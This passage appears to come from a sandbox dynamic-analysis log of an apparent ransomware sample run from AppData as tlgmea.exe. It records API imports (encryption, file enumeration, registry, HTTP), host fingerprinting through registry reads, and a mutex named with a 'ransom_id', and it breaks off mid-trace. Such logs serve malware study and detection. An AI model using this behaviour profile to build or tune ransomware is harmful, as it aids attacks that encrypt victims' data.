Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x74fca090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x74fc8770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x74fcfd10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x74fc9fc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x74fc7920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x74ff1c30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7724da90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x7724bae0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x74fc79b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77264f40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x74fc9a40 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x754d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x75505240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x754e38f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x75503140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x755050f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x754e55d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x75503230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x754eb9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x754e3e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x754edf70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x7728caa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x754e8ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x754e91c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x755056f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x755052a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x7554fcf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x754f7020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x754f4580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x754e4e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x754e1830 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x754ebea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x75505840 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77210000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x7726aca0 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x738d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x738ec544 True 1
Fn
System Get Time type = System Time, time = 2018-05-21 22:15:39 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x74fca330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74fcf400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74fc7580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74fc9910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x74fd6030 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x74fd5f90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x74fd5ff0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x74fca5d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x74fca690 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x772440f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7723d630 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7723ecf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x74fd5720 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x7723e140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7723eb60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77279990 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77275540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77269dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x74fca550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x74ff0a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x751d0790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x74fcf8a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x74fcfa30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x74ff1030 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x74fca000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x74ff14b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x74fca4f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x74ff16f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x74fc9970 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x75153c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x74fc8710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\tlgmea.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Microsoft\tlgmea.exe, size = 256 True 2
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x74fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x74fc77b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x74fcfbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x74fc7960 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x74fd60f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77269920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x74fc87c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x74fcc8c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x74fca510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x74fd5f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x74fcefc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74fc2d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x74fc0570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x74fcee30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x74fcc9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x74fd7510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77255e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x74fd5f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x74fd6250 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x74fd6340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x74fc78d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x74fca770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x74fd61d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x74fd6290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x74fd6510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x74fca410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x74fd3e90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x74fcfcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x74fd4cc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x74fd6450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x74fcd8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x74fc9a90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x74fc92b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772695f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x74fd6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x772653c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x74fd6300 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x74fed320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74fc9680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x74fc7540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x74fc91e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74fc2d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77272570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x74fd6180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74fc9560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x74fd6590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74fc9660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x74fc94b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x74fc8c10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x74fd6360 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x74fc9540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x74fce320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74fc9640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74fc8b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74fc7940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74fc7910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x74fc25e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x74fd5fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x74fed410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74fc2db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x74fd6540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x74fc8840 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x74fd3a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x74fd6420 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x74fd5db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x74fc9600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x74fd57f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x74fd64a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x74fc7610 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74fc8c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x74fd62e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74fc9700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x74fc2da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7724da90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x74fd3a30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77255e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x74fd74f0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x754d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x754f2f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x754f20f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x739ba340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x739ba240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75504ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x739c2220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x75503230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754e7740 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75504ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x754f2bb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x754eb9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x754e8ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x739c2130 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x7554cf50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x754fea00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x754ebea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x755052a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x754e91c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x754e38f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x754e3e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x739c1160 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x754f7020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x755050f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x75503140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x754fddf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x754e7710 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75620000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x756a0050 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x7569fc80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x739c17b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x739c1750 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x756d1710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x756a2220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x756cfdf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x756a25e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x756ca630 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x756a1da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x756a0dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x739c1080 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x756a0550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x756cdeb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x756a1c80 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74b50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74b6f550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74b6efa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74b6f0a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x74b6ee90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x74b70ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x74b70f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x74b6ed40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x74b6f8f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74b70730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x74b85c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74b70ad0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x74b6f890 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x74b85bd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x74b73fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x74b6fc10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74b6ed60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74b6ed80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74b6f0c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74b704a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74b70ee0 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75ba0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x75d2edb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75d34370 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75d34cb0 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76ff0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x77012290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x77038040 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x736a0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x73722410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x7376f750 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x73714510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x7373b650 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x73769fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x73712460 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x737111e0 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75310000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumDeviceDrivers, address_out = 0x75311380 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetDeviceDriverBaseNameW, address_out = 0x753113e0 True 1
Fn
Thread 0x908
73 31
»
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77210000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77236b10 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
